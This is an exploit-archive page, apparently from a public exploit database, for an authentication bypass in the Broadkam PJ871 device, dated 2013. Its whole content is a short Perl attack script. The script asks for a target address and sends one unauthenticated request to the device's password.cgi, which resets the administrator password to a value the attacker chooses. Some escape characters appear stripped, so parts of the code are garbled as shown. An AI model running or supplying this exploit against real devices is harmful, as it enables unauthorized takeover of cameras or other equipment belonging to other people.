[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Broadkam PJ871 Authentication Bypass
# Published : 2013-07-27
# Author :
# Previous Title : WiFly 1.0 Pro iOS - Multiple Vulnerabilities
# Next Title : TRENDnet TE100-P1U Print Server Firmware 4.11 Authentication Bypass Vulnerability
#!/usr/bin/perl
#d3c0der
use HTTP::Request;
use LWP::UserAgent;
print "= Target : ";
$ip=<STDIN>;
chomp $ip;
print "= new password : ";
$npass=<STDIN>;
chomp $npass;
if ( $ip !~ /^http:/ ) {
$ip = 'http://' . $ip;
}
if ( $ip !~ //$/ ) {
$ip = $ip . '/';
}
print "n";
print "->attacking , plz wait ! : $ipn";
@path1=("password.cgi?sysPassword=$npass");
foreach $ways(@path1){
$final=$ip.$ways;
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);
}
print "[-] password changed to $npass n";